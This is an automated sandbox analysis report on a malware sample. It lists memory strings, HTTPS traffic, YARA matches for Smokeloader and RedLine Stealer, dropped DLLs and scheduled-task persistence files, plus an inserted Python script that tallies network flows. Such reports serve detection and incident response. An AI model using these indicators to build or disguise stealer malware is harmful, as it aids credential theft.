Source: firefox.exe, 0000001F.00000003.2909698266.000001B107465000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2959579682.000001B107486000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909956595.000001B107486000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2959579682.000001B107465000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909956595.000001B107465000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2910203943.000001B107486000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909110092.000001B107465000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909110092.000001B107486000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account_shouldViewDownloadInternally/
Source: firefox.exe, 0000001F.00000002.2953298471.000001B104803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accounthttps://www.youtube.com/account
Source: 8e8f4571c5.exe, 0000001C.00000002.3374507339.0000000005388000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountr
Source: firefox.exe, 0000001F.00000002.2986979517.000001B116409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accounttipShownCount.searchTip_onboard
Source: firefox.exe, 0000001D.00000002.2903172052.0000018A47990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountzA
Source: 8e8f4571c5.exe, 0000001C.00000002.3374507339.0000000005388000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2953298471.000001B104803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account~
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 0000001F.00000002.2982408855.000001B115DA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001F.00000002.2982408855.000001B115DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49852 version: TLS 1.2
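The port lines above list every direction of every socket separately, so 44 entries describe roughly half that many connections, and only four of them come with a server IP and TLS version. The following script is an added example, not part of the sandbox report: it folds the per-direction lines back into one record per client socket, joins the HTTPS lines onto them, and lists the sockets for which the report gives no server IP at all (those must be attributed from the pcap). It assumes the Windows dynamic port range (49152 and up) identifies the client side; the sample input is a constructed subset of the lines above.

```python
import re
from collections import defaultdict

# Constructed input: a handful of the "Network traffic detected" / "HTTPS traffic detected"
# lines from this report, pasted verbatim. Feed the whole block of lines in practice.
REPORT_LINES = """\
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49848 version: TLS 1.2
"""

PORT_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
TLS_RE = re.compile(
    r"HTTPS traffic detected: ([\d.]+):(\d+) -> ([\d.]+):(\d+) version: (TLS [\d.]+)"
)
# Assumption: the Windows dynamic port range starts at 49152; the other end is the service port.
EPHEMERAL_MIN = 49152


def _new_flow():
    return {"server_port": None, "directions": set(), "server_ip": None, "tls": None}


def parse_flows(text):
    """Collapse per-direction port lines into one record per client port."""
    flows = defaultdict(_new_flow)
    for line in text.splitlines():
        m = PORT_RE.search(line)
        if m:
            a, b = int(m.group(1)), int(m.group(2))
            if a >= EPHEMERAL_MIN:          # client -> server
                client, server, direction = a, b, "out"
            else:                           # server -> client
                client, server, direction = b, a, "in"
            flows[client]["server_port"] = server
            flows[client]["directions"].add(direction)
            continue
        m = TLS_RE.search(line)
        if m:
            srv_ip, srv_port, _cli_ip, cli_port, version = m.groups()
            f = flows[int(cli_port)]
            f["server_port"] = int(srv_port)
            f["server_ip"] = srv_ip
            f["tls"] = version
            f["directions"].add("in")       # the TLS line is the server's half of the exchange
    return dict(flows)


def summarize(flows):
    """(client_port, server_port, bidirectional, server_ip, tls), sorted by client port."""
    return [
        (cp, f["server_port"], f["directions"] == {"in", "out"}, f["server_ip"], f["tls"])
        for cp, f in sorted(flows.items())
    ]


def unattributed(flows):
    """Client ports the report shows traffic for but no server IP: these need the pcap."""
    return sorted(cp for cp, f in flows.items() if f["server_ip"] is None)


if __name__ == "__main__":
    fl = parse_flows(REPORT_LINES)
    for row in summarize(fl):
        print(row)
    print("no server IP in report:", unattributed(fl))
```

On the constructed subset this yields five sockets, two of them attributed to Google-range addresses by the HTTPS lines, and one (49853) for which only the server-to-client half was logged; the three unattributed sockets are the ones worth pulling from the capture before deciding which of the listed domains were actually contacted.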
Source: 8e8f4571c5.exe, 00000018.00000002.3331828865.0000000001D97000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _WINAPI_GETRAWINPUTDATAI memstr_0a7d6275-2
Source: Yara match File source: Process Memory Space: 8e8f4571c5.exe PID: 8136, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8e8f4571c5.exe PID: 6484, type: MEMORYSTR

System Summary

Source: 00000015.00000002.2719081231.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000022.00000002.2994648505.0000000002620000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000002.2828964278.00000000026F2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2496144397.000000000273D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2495938996.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000015.00000002.2718459013.000000000254D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000002.2828820044.00000000026B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000022.00000002.2994271346.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 8e8f4571c5.exe, 00000018.00000002.3307114026.0000000000622000.00000040.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_86eb88e9-9
Source: 8e8f4571c5.exe, 00000018.00000002.3307114026.0000000000622000.00000040.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_f37d7c6e-6
Source: 8e8f4571c5.exe, 0000001C.00000002.3307370321.0000000000622000.00000040.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_ea29f676-6
Source: 8e8f4571c5.exe, 0000001C.00000002.3307370321.0000000000622000.00000040.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_4b1059e0-7
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name:
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name: .idata
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name:
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name:
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name: .idata
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: .idata
Source: explorti.exe.5.dr Static PE information: section name:
Source: axplong.exe.8.dr Static PE information: section name:
Source: axplong.exe.8.dr Static PE information: section name: .idata
Source: axplong.exe.8.dr Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C73B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C73B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C73B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C6DF280
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\userAAKKKEBFCG.exe File created: C:\Windows\Tasks\axplong.job
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D35A0 0_2_6C6D35A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C74545C 0_2_6C74545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E5440 0_2_6C6E5440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C74542B 0_2_6C74542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C715C10 0_2_6C715C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C722C10 0_2_6C722C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C74AC00 0_2_6C74AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C716CF0 0_2_6C716CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DD4E0 0_2_6C6DD4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E64C0 0_2_6C6E64C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6FD4D0 0_2_6C6FD4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7334A0 0_2_6C7334A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73C4A0 0_2_6C73C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E6C80 0_2_6C6E6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C700512 0_2_6C700512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6EFD00 0_2_6C6EFD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6FED10 0_2_6C6FED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7385F0 0_2_6C7385F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C710DD0 0_2_6C710DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C746E63 0_2_6C746E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DC670 0_2_6C6DC670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C713E50 0_2_6C713E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6F4640 0_2_6C6F4640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C722E4E 0_2_6C722E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6F9E50 0_2_6C6F9E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C739E30 0_2_6C739E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C717E10 0_2_6C717E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C725600 0_2_6C725600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7476E3 0_2_6C7476E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DBEF0 0_2_6C6DBEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6EFEF0 0_2_6C6EFEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C734EA0 0_2_6C734EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73E680 0_2_6C73E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6F5E90 0_2_6C6F5E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C717710 0_2_6C717710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E9F00 0_2_6C6E9F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C706FF0 0_2_6C706FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DDFE0 0_2_6C6DDFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7277A0 0_2_6C7277A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C71F070 0_2_6C71F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6F8850 0_2_6C6F8850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6FD850 0_2_6C6FD850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C71B820 0_2_6C71B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C724820 0_2_6C724820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E7810 0_2_6C6E7810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6FC0E0 0_2_6C6FC0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7158E0 0_2_6C7158E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7450C7 0_2_6C7450C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7060A0 0_2_6C7060A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C72B970 0_2_6C72B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C74B170 0_2_6C74B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6ED960 0_2_6C6ED960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6FA940 0_2_6C6FA940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70D9B0 0_2_6C70D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DC9A0 0_2_6C6DC9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C715190 0_2_6C715190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C732990 0_2_6C732990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C719A60 0_2_6C719A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C71E2F0 0_2_6C71E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6F1AF0 0_2_6C6F1AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C718AC0 0_2_6C718AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C742AB0 0_2_6C742AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D22A0 0_2_6C6D22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C704AA0 0_2_6C704AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6ECAB0 0_2_6C6ECAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C74BA90 0_2_6C74BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6EC370 0_2_6C6EC370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D5340 0_2_6C6D5340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C71D320 0_2_6C71D320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7453C8 0_2_6C7453C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DF380 0_2_6C6DF380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C78AC60 0_2_6C78AC60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C846C00 0_2_6C846C00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7DECD0 0_2_6C7DECD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C85AC30 0_2_6C85AC30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C77ECC0 0_2_6C77ECC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C816D90 0_2_6C816D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C90CDC0 0_2_6C90CDC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C908D20 0_2_6C908D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C784DB0 0_2_6C784DB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8AAD50 0_2_6C8AAD50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C84ED70 0_2_6C84ED70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C806E90 0_2_6C806E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C820EC0 0_2_6C820EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C860E20 0_2_6C860E20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C78AEC0 0_2_6C78AEC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C81EE70 0_2_6C81EE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8C8FB0 0_2_6C8C8FB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7EEF40 0_2_6C7EEF40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C786F10 0_2_6C786F10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C85EFF0 0_2_6C85EFF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C780FE0 0_2_6C780FE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8C0F20 0_2_6C8C0F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C78EFB0 0_2_6C78EFB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C842F70 0_2_6C842F70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7D0820 0_2_6C7D0820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8868E0 0_2_6C8868E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C80A820 0_2_6C80A820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C854840 0_2_6C854840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7B8960 0_2_6C7B8960
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C9009D0 appears 69 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C7194D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C70CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 2376
Source: file.exe, 00000000.00000002.2521834305.000000006C955000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000000.2043692814.000000000244C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe, 00000000.00000002.2521119351.000000006C762000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000015.00000002.2719081231.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000022.00000002.2994648505.0000000002620000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.2828964278.00000000026F2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
